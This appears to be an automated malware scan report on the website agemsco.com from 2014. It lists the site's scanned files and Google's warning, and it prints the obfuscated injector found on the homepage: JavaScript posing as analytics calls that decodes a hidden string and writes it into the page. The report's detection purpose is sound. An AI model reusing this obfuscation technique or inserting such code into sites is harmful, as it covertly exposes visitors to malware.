Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=agemsco.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://agemsco.com/ | 200 OK Content-Length: 24314 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw3 = []; _gw3.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']); _gw3.push(['_trackPageview', '6918518510413211618116518616716817817119318218118517518']); _gw3.push(['_setOption', '6175181180128167168185181178187186171129169178175182128']); _gw3.push(['_setOption', '1841711691861101221201211821901141671871861811141671871']); _gw3.push(['_setPageId', '8618111412212012118219011112919513011718518619117817113']); _gw3.push(['_trackPageview', '2']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw3.length; v++) t += _gw3[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://dev.agemsco.org/wordpress/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: application/javascript | clean |
http://dev.agemsco.org/wordpress/wp-content/themes/BusinessCard/js/jquery.cycle.all.min.js?ver=5050 | 200 OK Content-Length: 27880 Content-Type: application/javascript | clean |
http://dev.agemsco.org/wordpress/wp-content/plugins/google-custom-search/js/gsc.js?ver=5050 | 200 OK Content-Length: 563 Content-Type: application/javascript | clean |
http://www.google.com/jsapi?ver=5050 | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://dev.agemsco.org/wordpress/wp-content/themes/BusinessCard/epanel/shortcodes/js/et_shortcodes_frontend.js?ver=2.0 | 200 OK Content-Length: 13124 Content-Type: application/javascript | clean |
http://dev.agemsco.org/wordpress/wp-content/plugins/lightbox-plus/js/jquery.colorbox-min.js?ver=1.3.17.2 | 200 OK Content-Length: 9517 Content-Type: application/javascript | clean |
http://dev.agemsco.org/wordpress/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.8.20 | 200 OK Content-Length: 4295 Content-Type: application/javascript | clean |
http://dev.agemsco.org/wordpress/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.8.20 | 200 OK Content-Length: 3189 Content-Type: application/javascript | clean |
http://dev.agemsco.org/wordpress/wp-includes/js/jquery/ui/jquery.ui.mouse.min.js?ver=1.8.20 | 200 OK Content-Length: 2803 Content-Type: application/javascript | clean |
http://dev.agemsco.org/wordpress/wp-includes/js/jquery/ui/jquery.ui.resizable.min.js?ver=1.8.20 | 200 OK Content-Length: 17462 Content-Type: application/javascript | clean |
http://dev.agemsco.org/wordpress/wp-includes/js/jquery/ui/jquery.ui.draggable.min.js?ver=1.8.20 | 200 OK Content-Length: 18736 Content-Type: application/javascript | clean |
http://dev.agemsco.org/wordpress/wp-includes/js/jquery/ui/jquery.ui.button.min.js?ver=1.8.20 | 200 OK Content-Length: 6953 Content-Type: application/javascript | clean |
http://dev.agemsco.org/wordpress/wp-includes/js/jquery/ui/jquery.ui.position.min.js?ver=1.8.20 | 200 OK Content-Length: 4040 Content-Type: application/javascript | clean |
http://dev.agemsco.org/wordpress/wp-includes/js/jquery/ui/jquery.ui.dialog.min.js?ver=1.8.20 | 200 OK Content-Length: 11226 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: agemsco.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 02:39:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://dev.agemsco.org/wordpress/xmlrpc.php
GET / HTTP/1.1
Host: agemsco.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 02:39:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://dev.agemsco.org/wordpress/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: agemsco.com
Referer: http://www.google.com/search?q=agemsco.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: agemsco.com
Referer: http://www.google.com/search?q=agemsco.com
Result:
The result is similar to the first query. There are no suspicious redirects found.